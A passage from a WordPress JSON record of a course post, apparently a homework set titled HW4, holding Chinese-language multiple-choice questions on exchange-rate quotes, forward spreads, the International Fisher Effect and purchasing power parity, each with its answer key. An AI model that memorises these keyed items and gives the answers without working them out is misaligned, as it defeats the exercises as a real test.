&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0 \u65e5\u5713\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u6b50\u5f0f\u00a0\u00a0\u00a0\u00a0 105.26\u00a0\u00a0 106.38\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 102.04\u00a0\u00a0\u00a0 103.09<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0 \u8acb\u554f\u4e00\u55ae\u4f4d\u65e5\u5713\u5728\u5373\u671f\u5e02\u5834\u7684\u8cb7\u50f9\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)0.0098<\/p>\n<p>(B)0.0097<\/p>\n<p>(C)0.0095<\/p>\n<p>(D)0.0094<\/p>\n<p>\u7b54\u6848:(D)<\/p>\n<p>&nbsp;<\/p>\n<p>5. \u6839\u64da\u4e0a\u984c\u7684\u8cc7\u6599\uff0c\u8acb\u554f\u4e00\u55ae\u4f4d\u65e5\u5713\u768430\u5929\u671f\u9060\u532f\u8cb7\u50f9\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)0.0098<\/p>\n<p>(B)0.0097<\/p>\n<p>(C)0.0096<\/p>\n<p>(D)0.0095<\/p>\n<p>\u7b54\u6848:(B)<\/p>\n<p>&nbsp;<\/p>\n<p>6. \u6839\u64da\u7b2c4\u984c\u7684\u8cc7\u6599\uff0c\u8acb\u554f\u4e00\u55ae\u4f4d\u7f8e\u5143\u7684\u5373\u671f\u8cb7\u8ce3\u50f9\u5dee\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)1.02%<\/p>\n<p>(B)1.04%<\/p>\n<p>(C)1.06%<\/p>\n<p>(D)1.08%<\/p>\n<p>\u7b54\u6848:(C)<\/p>\n<p>&nbsp;<\/p>\n<p>7. \u6839\u64da\u7b2c4\u984c\u7684\u8cc7\u6599\uff0c\u8acb\u554f\u4e00\u55ae\u4f4d\u65e5\u5713\u768430\u5929\u671f\u9060\u532f\u8cb7\u8ce3\u50f9\u5dee\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)1.02%<\/p>\n<p>(B)1.04%<\/p>\n<p>(C)1.06%<\/p>\n<p>(D)1.08%<\/p>\n<p>\u7b54\u6848:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>8. \u5047\u8a2d\u4e00\u5e74\u671f\u5229\u7387\u5728\u7f8e\u570b\u662f5.5%\uff0c\u5728\u6b50\u5143\u5340\u662f4%\uff1b\u76ee\u524d\u6b50\u5143\u514c\u7f8e\u5143\u5373\u671f\u532f\u7387\u70baUS$1.22\/\u20ac\uff0c\u8acb\u554f\u6839\u64da\u570b\u969b\u8cbb\u96ea\u6548\u61c9\u689d\u4ef6(IFE)\u9810\u6e2c\u4e4b\u4e00\u5e74\u5f8c\u5373\u671f\u532f\u7387\u70ba\u4f55\uff1f<\/p>\n<p>(A)1.0204<\/p>\n<p>(B)1.1235<\/p>\n<p>(C)1.1564<\/p>\n<p>(D)1.2376<\/p>\n<p>\u7b54\u6848:(D)<\/p>\n<p>&nbsp;<\/p>\n<p>9. \u5047\u8a2d\u4e00\u76ce\u53f8\u9ec3\u91d1\u5728\u7f8e\u570b\u7684\u552e\u50f9\u70baUS$35\uff0c\u5728\u82f1\u570b\u7684\u552e\u50f9\u70ba\uffe112.5\uff0c\u5247\u7f8e\u5143\u514c\u63db\u82f1\u938a\u7684\u7f8e\u5f0f\u5831\u50f9\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)2.8<\/p>\n<p>(B)0.3571<\/p>\n<p>(C)0.08<\/p>\n<p>(D)2.86<\/p>\n<p>\u7b54\u6848:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>10. \u5047\u8a2d\u672a\u4f86\u4e00\u5e74\u7684\u9810\u671f\u901a\u8ca8\u81a8\u8139\u7387\u5728\u7f8e\u570b\u662f3.6%\uff0c\u5728\u52a0\u62ff\u5927\u662f5.2%\uff0c\u76ee\u524d\u5373\u671f\u532f\u7387\u662fUS$0.8100\/ C$\uff0c\u5247PPP\u6240\u9810\u6e2c\u7684\u4e00\u5e74\u5f8c\u5373\u671f\u532f\u7387\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)0.6324<\/p>\n<p>(B)0.7977<\/p>\n<p>(C)0.8225<\/p>\n<p>(D)1.2158<\/p>\n<p>\u7b54\u6848:(B)<\/p>\n<p>&nbsp;<\/p>\n<div class=\"page\" title=\"Page 1\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>11. \u4e00\u55ae\u4f4d\u5916\u570b\u8ca8\u5e63\u514c\u63db\u591a\u5c11\u672c\u570b\u8ca8\u5e63\u7684\u532f\u7387\u8868\u793a\u65b9\u5f0f\uff0c\u7a31\u70ba:<\/p>\n<p>(A)\u76f4\u63a5\u532f\u7387<\/p>\n<p>(B)\u9593\u63a5\u532f\u7387<\/p>\n<p>(C)\u8907\u5f0f\u532f\u7387<\/p>\n<p>(D)\u9060\u671f\u532f\u7387<\/p>\n<p>(E)\u5dee\u5225\u532f\u7387<\/p>\n<p>\u7b54:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>12. \u82e5\u4ee5\u76f4\u63a5\u532f\u7387\u7684\u65b9\u5f0f\u4f86\u8868\u793a\uff0c\u7576\u532f\u7387\u4e0a\u5347\u6642\uff0c\u4ee3\u8868\u672c\u570b\u8ca8\u5e63:<\/p>\n<p>(A)\u5347\u503c<\/p>\n<p>(B)\u8cb6\u503c<\/p>\n<p>(C)\u4e0d\u53d7\u5f71\u97ff<\/p>\n<p>(D)\u4e0d\u4e00\u5b9a<\/p>\n<p>\u7b54:(B)<\/p>\n<p>&nbsp;<\/p>\n<p>13. \u82e5\u672c\u570b\u8ca8\u5e63\u76f8\u5c0d\u5916\u570b\u8ca8\u5e63\u8cb6\u503c\uff0c\u5728\u5176\u4ed6\u60c5\u6cc1\u4e0d\u8b8a\u4e0b\uff0c\u672c\u570b\u7684\u9032\u53e3\u91cf\u5c07\u6703:<\/p>\n<p>(A)\u589e\u52a0<\/p>\n<p>(B)\u4e0d\u8b8a<\/p>\n<p>(C)\u4e0b\u964d<\/p>\n<p>(D)\u4e0d\u4e00\u5b9a<\/p>\n<p>\u7b54:(C)<\/p>\n<p>&nbsp;<\/p>\n<p>14. \u4f9d\u64da\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa\uff0c\u672c\u570b\u901a\u8ca8\u81a8\u8139\u7387\u5927\u65bc\u5916\u570b\u901a\u8ca8\u81a8\u8139\u7387\uff0c\u5247:<\/p>\n<p>(A)\u532f\u7387\u4e0b\u964d<\/p>\n<p>(B)\u51fa\u53e3\u589e\u52a0<\/p>\n<p>(C)\u9032\u53e3\u6e1b\u5c11<\/p>\n<p>(D)\u532f\u7387\u4e0a\u5347<\/p>\n<p>(E)\u8cc7\u672c\u5167\u6d41<\/p>\n<p>\u7b54:(D)<\/p>\n<p>&nbsp;<\/p>\n<p>15. \u5728\u5176\u4ed6\u60c5\u6cc1\u4e0d\u8b8a\u4e0b\uff0c\u5927\u5e45\u63d0\u9ad8\u9032\u53e3\u95dc\u7a05\u6703\u9020\u6210:<\/p>\n<p>(A)\u532f\u7387\u4e0b\u964d<\/p>\n<p>(B)\u9032\u53e3\u589e\u52a0<\/p>\n<p>(C)\u532f\u7387\u4e0a\u5347<\/p>\n<p>(D)\u672c\u570b\u4eba\u5c0d\u5916\u570b\u7684\u7522\u54c1\u9700\u6c42\u589e\u52a0<\/p>\n<p>\u7b54:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>16. \u5728\u5176\u4ed6\u60c5\u6cc1\u4e0d\u8b8a\u4e0b\uff0c\u4e0b\u5217\u54ea\u4e00\u9805\u56e0\u7d20\u8b8a\u52d5\uff0c\u6703\u4f7f\u672c\u570b\u8ca8\u5e63\u5347\u503c?<\/p>\n<p>(A)\u672c\u570b\u76f8\u5c0d\u7269\u50f9\u6c34\u6e96\u4e0a\u6f32<\/p>\n<p>(B)\u672c\u570b\u9032\u53e3\u95dc\u7a05\u4e0b\u964d<\/p>\n<p>(C)\u5c0d\u5916\u570b\u8ca8\u504f\u597d\u63d0\u9ad8<\/p>\n<p>(D)\u672c\u570b\u7684\u76f8\u5c0d\u751f\u7522\u529b\u63d0\u9ad8<\/p>\n<p>(E)\u672c\u570b\u5229\u7387\u4e0b\u964d<\/p>\n<p>\u7b54:(D)<\/p>\n<p>&nbsp;<\/p>\n<p>17. \u5047\u8a2d\u5176\u4ed6\u60c5\u6cc1\u4e0d\u8b8a\u4e0b\uff0c\u7576\u672c\u570b\u5229\u7387\u548c\u5916\u570b\u5229\u7387\u7684\u5dee\u8ddd\u64f4\u5927\u6642\uff0c\u672c\u570b\u8ca8\u5e63\u6703:<\/p>\n<p>(A)\u5347\u503c<\/p>\n<p>(B)\u8cb6\u503c<\/p>\n<p>(C)\u4e0d\u8b8a<\/p>\n<p>(D)\u4e0d\u4e00\u5b9a<\/p>\n<p>\u7b54:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>18. \u4e0b\u5217\u54ea\u4e00\u7a2e\u56e0\u7d20\u6700\u6709\u53ef\u80fd\u9020\u6210\u672c\u570b\u8ca8\u5e63\u8cb6\u503c?<\/p>\n<p>(A)\u5916\u570b\u7269\u50f9\u6c34\u6e96\u4e0d\u8b8a\uff0c\u800c\u672c\u570b\u7269\u50f9\u6c34\u6e96\u4e0a\u6f32<\/p>\n<p>(B)\u9810\u671f\u672c\u570b\u8ca8\u5e63\u6703\u5347\u503c<\/p>\n<p>(C)\u672c\u570b\u5229\u7387\u6c34\u6e96\u4e0a\u5347\uff0c\u800c\u5916\u570b\u5229\u7387\u6c34\u6e96\u4e0d\u8b8a<\/p>\n<p>(D)\u672c\u570b\u63d0\u9ad8\u9032\u53e3\u95dc\u7a05<\/p>\n<p>(E)\u672c\u570b\u4eba\u5c0d\u5916\u570b\u8ca8\u7684\u504f\u597d\u964d\u4f4e<\/p>\n<p>\u7b54:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>19. \u82e5 1 \u7f8e\u5143\u514c\u63db\u65b0\u53f0\u5e63\u7684\u532f\u7387\u5f9e 20 \u5347\u70ba 25\uff0c\u8868\u793a\u65b0\u53f0\u5e63\u8cb6\u503c\u4e86:<\/p>\n<p>(A) 20%<\/p>\n<p>(B) 25%<\/p>\n<p>(C) 5%<\/p>\n<p>(D) 10%<\/p>\n<p>(E) 50%<\/p>\n<p>\u7b54:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>20. \u4e0b\u5217\u6709\u95dc\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa\u7684\u6558\u8ff0\uff0c\u4f55\u8005\u662f\u932f\u8aa4\u7684?<\/p>\n<p>(A)\u672c\u570b\u76f8\u5c0d\u7269\u50f9\u6c34\u6e96\u4e0a\u5347\uff0c\u532f\u7387\u5c07\u6703\u4e0a\u5347<\/p>\n<p>(B)\u672c\u570b\u76f8\u5c0d\u7269\u50f9\u6c34\u6e96\u4e0a\u5347\uff0c\u8868\u793a\u672c\u570b\u8ca8\u5e63\u7684\u8cfc\u8cb7\u529b\u4e0b\u964d<\/p>\n<p>(C)\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa\u7684\u9577\u671f\u89e3\u91cb\u80fd\u529b\u4f4e\u65bc\u77ed\u671f\u7684\u89e3\u91cb\u80fd\u529b<\/p>\n<p>(D)\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa\u6709\u4e00\u4e9b\u7f3a\u9ede<\/p>\n<p>(E)\u8cfc\u8cb7\u529b\u5e73\u50f9\u8aaa\u96d6\u7136\u6709\u4e00\u4e9b\u7f3a\u9ede\uff0c\u4f46\u662f\u5b83\u4ecd\u662f\u5f88\u91cd\u8981\u7684\u532f\u7387\u7406\u8ad6<\/p>\n<p>\u7b54:(C)<\/p>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>&lt;HW4&gt; 1. Selling Currency Call Opt<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=\/wp\/v2\/posts\/980"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=980"}],"version-history":[{"count":11,"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=\/wp\/v2\/posts\/980\/revisions"}],"predecessor-version":[{"id":994,"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=\/wp\/v2\/posts\/980\/revisions\/994"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154133\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}